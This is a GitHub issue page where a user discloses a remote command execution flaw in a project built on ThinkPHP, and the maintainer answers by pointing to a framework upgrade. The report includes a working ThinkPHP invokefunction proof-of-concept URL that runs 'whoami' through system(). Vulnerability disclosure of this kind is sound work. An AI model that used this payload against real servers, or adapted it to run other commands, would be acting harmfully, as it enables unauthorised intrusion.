Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

There is A RCE vulnerability in your system. #33

Open
CCkiller opened this Issue Jan 12, 2019 · 1 comment

Comments

Projects
None yet
2 participants
@CCkiller
Copy link

CCkiller commented Jan 12, 2019

The RCE(Remote Command Execution) vulnerability is triggered by a http request.Successfully executed the command "whoami".
poc:
http://58.82.XXX.XXX:8080/public//?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami
default
default

@xiayulei

This comment has been minimized.

Copy link
Owner

xiayulei commented Jan 14, 2019

This is the official vulnerability of ThinkPHP, please upgrade the core framework to the latest version of the official.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.